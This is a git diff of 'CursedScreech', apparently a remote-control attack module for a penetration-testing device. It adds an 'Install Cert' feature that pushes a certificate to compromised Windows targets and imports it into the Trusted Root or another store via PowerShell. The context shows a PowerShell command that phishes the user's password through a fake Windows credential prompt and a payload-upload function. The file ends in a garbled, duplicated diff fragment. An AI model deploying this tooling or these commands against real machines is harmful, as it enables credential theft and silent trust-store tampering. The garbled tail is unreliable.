diff --git a/CursedScreech/api/module.php b/CursedScreech/api/module.php
index 8791a25..de21987 100755
--- a/CursedScreech/api/module.php
+++ b/CursedScreech/api/module.php
@@ -422,7 +422,7 @@ class CursedScreech extends Module {
 		$files = scandir(__API_DL__);
 		$success = true;
 		foreach ($files as $file) {
-			if ($file == "." || $file == "..") {continue;}
+			if (substr($file, 0, 1) == ".") {continue;}
 			if (!unlink(__API_DL__ . $file)) {
 				$success = false;
 			}
@@ -449,7 +449,7 @@ class CursedScreech extends Module {
 		$files = [];
 		
 		foreach (scandir(__PAYLOADS__) as $file) {
-			if ($file == "." || $file == "..") {continue;}
+			if (substr($file, 0, 1) == ".") {continue;}
 			$files[$file] = __PAYLOADS__;
 		}
 		$this->respond(true, null, $files);
@@ -521,7 +521,7 @@ class CursedScreech extends Module {
 		$dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__);
 		$contents = array();
 		foreach (scandir($dir) as $log) {
-			if ($log == "." || $log == "..") {continue;}
+			if (substr($log, 0, 1) == ".") {continue;}
 			array_push($contents, $log);
 		}
 		$this->respond(true, null, $contents);
@@ -575,7 +575,7 @@ class CursedScreech extends Module {
 		$keys = scandir($dir);
 		$certs = array();
 		foreach ($keys as $key) {
-			if ($key == "." || $key == "..") {continue;}
+			if (substr($key, 0, 1) == ".") {continue;}
 
 			$parts = explode(".", $key);
 			$fname = $parts[0];
diff --git a/CursedScreech/includes/changelog/Version 1.3 b/CursedScreech/includes/changelog/Version 1.3
new file mode 100644
index 0000000..9d5c0de
--- /dev/null
+++ b/CursedScreech/includes/changelog/Version 1.3	
@@ -0,0 +1,5 @@
+January 5, 2018
+<br /><br />
+ - Modified hook into Papers to work with the latest release<br />
+ - Added ability to install a certificate on a target Windows machine<br />
+ 
\ No newline at end of file
diff --git a/CursedScreech/includes/forest/ezcmds b/CursedScreech/includes/forest/ezcmds
index 358600a..11b2bf9 100755
--- a/CursedScreech/includes/forest/ezcmds
+++ b/CursedScreech/includes/forest/ezcmds
@@ -1,4 +1,5 @@
 Send File:C:\Temp\
+Install Cert:powershell "Import-Certificate -FilePath $cert -CertStoreLocation $store"
 Get PS Version:powershell "$PSVersionTable"
 Get SysInfo:powershell "gwmi Win32_QuickFixEngineering | Select Description, HotFixID, InstalledBy, InstalledOn; gwmi Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName, CSDVersion, NumberOfUsers, Version | FL"
 Windows PSv3+ Phish:powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
diff --git a/CursedScreech/includes/forest/target.py b/CursedScreech/includes/forest/target.py
index e79eb7e..07900ba 100755
--- a/CursedScreech/includes/forest/target.py
+++ b/CursedScreech/includes/forest/target.py
@@ -14,7 +14,7 @@ with open(settingsFile, "r") as sFile:
 		if params[0] == "activity_log":
 			activity_log = params[1]
 		elif params[0] == "kuro_key":
-			priv_key = params[1] + ".pem"
+			priv_key = params[1] + ".key"
 			pub_cer = params[1] + ".cer"
 		elif params[0] == "target_key":
 			client_key = params[1] + ".cer"
diff --git a/CursedScreech/includes/scripts/testEncrypt.sh b/CursedScreech/includes/scripts/testEncrypt.sh
index 10821e1..bffb14f 100755
--- a/CursedScreech/includes/scripts/testEncrypt.sh
+++ b/CursedScreech/includes/scripts/testEncrypt.sh
@@ -23,7 +23,7 @@ while [ "$#" -gt 0 ]
 do
 
 if [[ "$1" == "-k" ]]; then
-	KEY="$2.pem"
+	KEY="$2.key"
 fi
 if [[ "$1" == "-d" ]]; then
         KEYDIR="$2"
diff --git a/CursedScreech/js/module.js b/CursedScreech/js/module.js
index 0b7cd89..2349b2c 100755
--- a/CursedScreech/js/module.js
+++ b/CursedScreech/js/module.js
@@ -51,6 +51,22 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 	$scope.newCmdName			= "";
 	$scope.newCmdCommand		= "";
 	$scope.checkAllTargets		= false;
+	$scope.target_installKey	= "";
+	$scope.certStores			= [
+									{"ID":"Root", "Name":"Trusted Root Certification Authorities"},
+									{"ID":"My", "Name":"Personal"},
+									{"ID":"Remote Desktop", "Name":"Remote Desktop"},
+									{"ID":"Trust", "Name":"Enterprise Trust"},
+									{"ID":"CA", "Name":"Intermediate Certification Authorities"},
+									{"ID":"SmartCardRoot", "Name":"Smart Card Trusted Roots"},
+									{"ID":"TrustedPublisher", "Name":"Trusted Publishers"},
+									{"ID":"TrustedPeople", "Name":"Trusted People"},
+									{"ID":"ClientAuthIssuer", "Name":"Client Authentication Issuers"},
+									{"ID":"eSIM Certification Authorities", "Name":"eSIM Certification Authorities"},
+									{"ID":"Windows Live ID Token Issuer", "Name":"Windows Live ID Token Issuer"},
+									{"ID":"Homegroup Machine Certificates", "Name":"Homegroup Machine Certificates"}
+								];
+	$scope.selectedCertStore	= $scope.certStores[0];
 	
 	// Panes
 	$scope.showTargetPane		= true;
@@ -62,6 +78,7 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 	$scope.uploading			= false;
 	$scope.selectedPayload		= "";
 	$scope.showPayloadSelect	= false;
+	$scope.showCertSelect		= false;
 	
 	// Interval vars
 	$scope.stop;
@@ -313,6 +330,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 		if ($scope.showPayloadSelect) {
 			// ex: "sendfile;/pineapple/modules/CursedScreech/includes/payloads/NetCli.exe;C:\Temp\"
 			cmd = "sendfile;" + $scope.payloadDir + $scope.selectedPayload.fileName + ";" + $scope.targetCommand;
+		} else if ($scope.showCertSelect) {
+			cmd = "sendfile;" + $scope.target_installKey + ";" + getEZCmd("Send File");
 		} else {
 			cmd = $scope.targetCommand;
 		}
@@ -321,7 +340,23 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 			action: 'sendCommand',
 			command: cmd,
 			targets: checkedTargets
-		},function(response){});
+		},function(response){
+			
+			// Make a second API call to install the certificate
+			if ($scope.showCertSelect) {
+
+				cmd = $scope.targetCommand.replace("$cert", getEZCmd("Send File") + $scope.target_installKey.split("/").slice(-1)[0]).replace("$store", "'Cert:\\LocalMachine\\" + $scope.selectedCertStore.ID + "'")
+				
+				$api.request({
+					module: 'CursedScreech',
+					action: 'sendCommand',
+					command: cmd,
+					targets: checkedTargets
+				},function(response){});
+				
+			}
+			
+		});
 	});
 	
 	function getTargetIndex(sock){
@@ -458,23 +493,27 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 	});
 	
 	$scope.ezCommandChange = (function(){
+		$scope.showPayloadSelect = false;
+		$scope.showCertSelect = false;
 		if ($scope.selectedCmd === null) {
 			$scope.targetCommand = "";
-			$scope.showPayloadSelect = false;
 			return;
 		}
 		for (key in $scope.ezcmds) {
 			if ($scope.ezcmds[key] == $scope.selectedCmd) {
 				if (key == "Send File") {
 					$scope.showPayloadSelect = true;
-				} else {
-					$scope.showPayloadSelect = false;
+				} else if (key == "Install Cert") {
+					$scope.showCertSelect = true;
 				}
 			}
 		}
 		$scope.targetCommand = $scope.selectedCmd;
 	});
 	
+	function getEZCmd(key) {
+		return $scope.ezcmds[key];
+	}
 	
 	/* ============================================= */
 	/*              BEGIN KEY FUNCTIONS              */
@@ -484,9 +523,15 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 		if (type == "kuro") {
 			$scope.selectKuroKey = true;
 			$scope.selectTargetKey = false;
+			$scope.selectInstallKey = false;
 		} else if (type == "target") {
 			$scope.selectTargetKey = true;
 			$scope.selectKuroKey = false;
+			$scope.selectInstallKey = false;
+		} else if (type == "install") {
+			$scope.selectInstallKey = true;
+			$scope.selectKuroKey = false;
+			$scope.selectTargetKey = false;
 		}
 		$api.request({
 			module: 'CursedScreech',
@@ -509,6 +554,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 			$scope.settings_kuroKey = keyPath;
 		} else if ($scope.selectTargetKey == true) {
 			$scope.settings_targetKey = keyPath;
+		} else if ($scope.selectInstallKey == true) {
+			$scope.target_installKey = keyPath + ".cer";
 		}
 	});
 	
diff --git a/CursedScreech/module.html b/CursedScreech/module.html
index d39ea37..783e293 100755
--- a/CursedScreech/module.html
+++ b/CursedScreech/module.html
@@ -234,14 +234,27 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
 											<option value="" selected>Select...</option>
 										</select>
 										<br />
-										<div ng-show="showPayloadSelect">
+										<div ng-show="showPayloadSelect" ng-hide="!showPayloadSelect">
 											<select ng-disabled="kuroButton=='Start'" class="form-control" ng-model="selectedPayload" ng-options="payload.fileName for payload in payloads">
 												<option value="" disabled selected>Select Payload...</option>
 											</select>
 											<br />
 											<h4>Remote upload path</h4>
 										</div>
-										<input type="text" ng-model="targetCommand" class="form-control block" ng-disabled="kuroButton=='Start'" placeholder="Send command to target"><br />
+										<div ng-show="showCertSelect" ng-hide="!showCertSelect">
+											<div class="row form-group">
+												<div class="col-md-6">
+													<input type="text" ng-model="target_installKey" class="form-control" placeholder="Select Certificate...">
+												</div>
+												<div class="col-md-2">
+													<button type="button" class="btn btn-sm" data-toggle="modal" data-target="#cs_keyModal" ng-click="loadCertificates('install');">SSL Store</button>
+												</div>
+											</div>
+											<h4>Certificate Store</h4>
+											<select ng-disabled="kuroButton=='Start'" class="form-control" ng-model="selectedCertStore" ng-options="store.Name for store in certStores">
+											</select>
+										</div>
+										<input type="text" ng-model="targetCommand" class="form-control block" ng-show="!showCertSelect" ng-hide="showCertSelect" ng-disabled="kuroButton=='Start'" placeholder="Send command to target"><br />
 										<table style="width: 100%">
 											<tr><td>
 												<button type="button" class="btn btn-sm cs_hoverInfo" style="width: 100px;" ng-disabled="kuroButton=='Start'" ng-click="sendCommand();">Send</button>
@@ -397,7 +410,7 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
 						<tbody>
 							<tr ng-repeat="(key, value) in ezcmds">
 								<td>
-									<button type="button" class="btn cs_hoverDanger" ng-disabled="key == 'Send File'" ng-click="deleteEZCmd(key);"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
+									<button type="button" class="btn cs_hoverDanger" ng-disabled="key == 'Send File' || key == 'Install Cert'" ng-click="deleteEZCmd(key);"><img src="/modules/CursedScreech/includes/icons/glyphicons-198-remove-circle.png"/></button>
 								</td>
 								<td style="width: 200px">
 									<label class="form-label">{{ key }}</label>
diff --git a/CursedScreech/module.info b/CursedScreech/module.info
index 7c83c87..54cdc2a 100755
--- a/CursedScreech/module.info
+++ b/CursedScreech/module.info
@@ -6,5 +6,5 @@
         "tetra"
     ],
     "title": "CursedScreech",
-    "version": "1.2"
-}
\ No newline at end of file
+    "version": "1.3"
+}

@@ -397,7 +410,7 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
- +	{{ key }} diff --git a/CursedScreech/module.info b/CursedScreech/module.info index 7c83c87..54cdc2a 100755 --- a/CursedScreech/module.info +++ b/CursedScreech/module.info @@ -6,5 +6,5 @@ "tetra" ], "title": "CursedScreech", - "version": "1.2" -} \ No newline at end of file + "version": "1.3" +}